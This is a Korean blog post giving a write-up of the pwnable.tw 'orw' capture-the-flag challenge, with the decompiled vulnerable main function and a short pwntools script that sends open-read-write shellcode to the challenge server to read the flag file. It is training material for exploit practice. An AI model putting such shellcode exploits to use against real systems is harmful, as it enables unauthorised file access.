ssongk
ssongk
ssongk
전체 방문자
오늘
어제

공지사항

  • resources
  • 분류 전체보기 (626)
    • CTF (24)
    • background (79)
      • fuzzing (5)
      • linux (29)
      • linux kernel (15)
      • windows (2)
      • web assembly (1)
      • embedded (0)
      • web (13)
      • crypto (9)
      • mobile (1)
      • AI (1)
      • etc.. (3)
    • write-up(pwn) (171)
      • dreamhack (102)
      • pwn.college (4)
      • pwnable.xyz (51)
      • pwnable.tw (3)
      • pwnable.kr (5)
      • G04T (6)
    • write-up(rev) (32)
      • dreamhack (24)
      • reversing.kr (8)
    • write-up(web) (195)
      • dreamhack (63)
      • LOS (40)
      • webhacking.kr (69)
      • websec.fr (3)
      • wargame.kr (6)
      • webgoat (1)
      • G04T (7)
      • suninatas (6)
    • write-up(crypto) (19)
      • dreamhack (16)
      • G04T (1)
      • suninatas (2)
    • write-up(forensic) (53)
      • dreamhack (5)
      • ctf-d (47)
      • suninatas (1)
    • write-up(misc) (13)
      • dreamhack (12)
      • suninatas (1)
    • development (31)
      • Linux (14)
      • Java (13)
      • Python (1)
      • C (2)
      • TroubleShooting (1)
    • 자격증 (8)
    • 이산수학 (1)
    • 정보보안 (0)
hELLO · Designed By 정상우.
ssongk

ssongk

[pwnable.tw] orw write-up
write-up(pwn)/pwnable.tw

[pwnable.tw] orw write-up

2024. 8. 19. 21:02

문제 제목과 설명 그대로 orw 쉘 코드를 실행시켜주면 된다.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 200);
  ((void (*)(void))shellcode)();
  return 0;
}

 

seccomp-tools로 확인해보면 다음과 같다.

 

로컬 문제 파일에선 shellcode 영역에 x권한이 없는데 리모트에는 있는 듯 하다.

from pwn import *

p = process('./orw')
p = remote('chall.pwnable.tw', 10001)

pay = asm(shellcraft.open('/home/orw/flag'))
pay += asm(shellcraft.read(3,'esp',0x100))
pay += asm(shellcraft.write(1,'esp',0x100))

p.send(pay)
p.interactive()

'write-up(pwn) > pwnable.tw' 카테고리의 다른 글

[pwnable.tw] calc write-up  (3) 2024.09.17
[pwnable.tw] start write-up  (0) 2024.08.16
    'write-up(pwn)/pwnable.tw' 카테고리의 다른 글
    • [pwnable.tw] calc write-up
    • [pwnable.tw] start write-up
    ssongk
    ssongk
    벌레 사냥꾼이 되고 싶어요

    티스토리툴바